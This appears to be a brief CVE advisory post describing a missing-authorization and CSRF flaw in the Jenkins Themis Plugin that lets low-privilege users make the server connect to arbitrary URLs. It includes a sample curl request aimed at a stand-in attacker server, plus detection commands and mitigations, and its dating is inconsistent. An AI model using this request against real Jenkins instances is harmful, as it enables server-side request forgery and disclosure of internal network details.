Jenkins Themis Plugin Missing Authorization and CSRF Vulnerability CVE-2025-XXXX (Moderate)

By /

Listen to this Post

The CVE-2025-XXXX vulnerability in the Jenkins Themis Plugin stems from a missing permission check on a specific HTTP endpoint. In affected versions (1.4.1 and earlier), the plugin does not verify user permissions for a particular URL handler. This allows any attacker who has the Overall/Read permission in Jenkins, which is a basic and widely granted privilege, to send crafted HTTP requests to this endpoint. The endpoint is then manipulated to connect to an arbitrary, attacker-specified web server URL. Furthermore, the vulnerability is exacerbated by the fact that the endpoint accepts GET requests, making it susceptible to Cross-Site Request Forgery (CSRF). An attacker could trick a logged-in Jenkins user with Overall/Read permission into visiting a malicious website, which would then automatically trigger a request to the vulnerable endpoint, forcing the Jenkins server to connect to an external attacker-controlled system.
Platform: Jenkins Themis Plugin
Version: 1.4.1 and earlier
Vulnerability: Missing Authorization & CSRF
Severity: Moderate
date: 2024-10-29

Prediction: 2024-11-12

What Undercode Say:

`curl -X GET ‘http://jenkins-host/jenkins/themis-vulnerable-endpoint?url=http://attacker-server.com’`

` Checks for plugin presence`

`find /var/lib/jenkins/plugins -name “themis.jpi”`

` Reviewing installed plugins list`

`cat /var/lib/jenkins/config.xml | grep -A 5 -B 5 “themis”`

How Exploit:

Attacker crafts a malicious link or embeds an image tag targeting the vulnerable endpoint, forcing the Jenkins server to send a request to an external server they control, potentially leaking information like internal network data or Jenkins instance IP. Exploitation requires the victim to have Overall/Read permission and be tricked into clicking a link (CSRF) or an attacker having that same permission level directly.

Protection from this CVE:

Upgrade plugin upon patch release. Until then, restrict Overall/Read permissions. Implement strict firewall egress rules. Use a reverse proxy to filter unexpected outbound connections from the Jenkins server.

Impact:

Server-Side Request Forgery (SSRF). Unauthorized connection to internal systems. Potential information disclosure about network topology.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top